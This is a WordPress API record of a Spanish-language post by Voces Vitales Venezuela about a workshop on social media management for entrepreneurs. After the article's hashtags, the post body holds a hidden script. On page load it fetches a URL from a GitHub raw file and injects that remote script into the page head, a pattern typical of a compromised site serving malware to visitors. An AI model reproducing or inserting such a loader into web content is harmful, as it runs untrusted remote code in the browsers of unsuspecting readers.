{"id":3906,"date":"2024-07-04T14:36:50","date_gmt":"2024-07-04T19:06:50","guid":{"rendered":"https:\/\/vocesvitalesvenezuela.org\/site\/?p=3906"},"modified":"2024-07-25T05:10:56","modified_gmt":"2024-07-25T09:40:56","slug":"taller-gestion-de-redes-sociales-para-emprendimientos","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3906","title":{"rendered":"Taller \u00abGesti\u00f3n de redes sociales para emprendimientos\u00bb"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"size-medium wp-image-3907 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/3-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/3-300x169.jpg 300w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/3-1024x576.jpg 1024w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/3-768x432.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/3.jpg 1280w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p style=\"text-align: justify;\">El pasado jueves 4 de julio, <strong>Voces Vitales Venezuela<\/strong> llev\u00f3 a cabo un taller titulado <strong>\u00abGesti\u00f3n de redes sociales para emprendimientos\u00bb<\/strong> en la sede de la <strong>Fundaci\u00f3n Zoom<\/strong>. La actividad estuvo dirigida al personal administrativo y fue impartida por la soci\u00f3loga <strong>Yenni Pe\u00f1a<\/strong>, directora de la <strong>ONG Empoderarse<\/strong>.<\/p>\n<p style=\"text-align: justify;\">Durante el taller, se destac\u00f3 la importancia de las redes sociales como una herramienta de comunicaci\u00f3n r\u00e1pida y directa para llegar a un amplio p\u00fablico de manera inmediata. Se resalt\u00f3 su papel fundamental en las <strong>estrategias de marketing<\/strong>, permitiendo ampliar la visibilidad de los emprendimientos, fortalecer la relaci\u00f3n con los clientes y aumentar las ventas.<\/p>\n<p style=\"text-align: justify;\">Los participantes fueron instados a considerar aspectos clave como la relevancia de lo que se publica, la creaci\u00f3n de contenido adecuado para la audiencia, la escucha activa a los clientes y el seguimiento de las publicaciones para identificar las preferencias de los seguidores.<\/p>\n<p style=\"text-align: justify;\">En resumen, el taller proporcion\u00f3 herramientas y estrategias para optimizar la gesti\u00f3n de redes sociales y potenciar el crecimiento de los emprendimientos.<\/p>\n<p style=\"text-align: justify;\">#Taller #GestionRedesSociales #MarketingDigital #Estrategias #GeneraciondeContenido #Emprendimientos<\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El pasado jueves 4 de julio, Voces Vitales Venezuela llev\u00f3 a cabo un taller titulado \u00abGesti\u00f3n de redes sociales para emprendimientos\u00bb en la sede de la Fundaci\u00f3n Zoom. La actividad estuvo dirigida al personal administrativo y fue impartida por la&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3906\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3908,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[92,612],"tags":[628,626,627,629,625,10],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3906"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3906"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3906\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3908"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3906"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}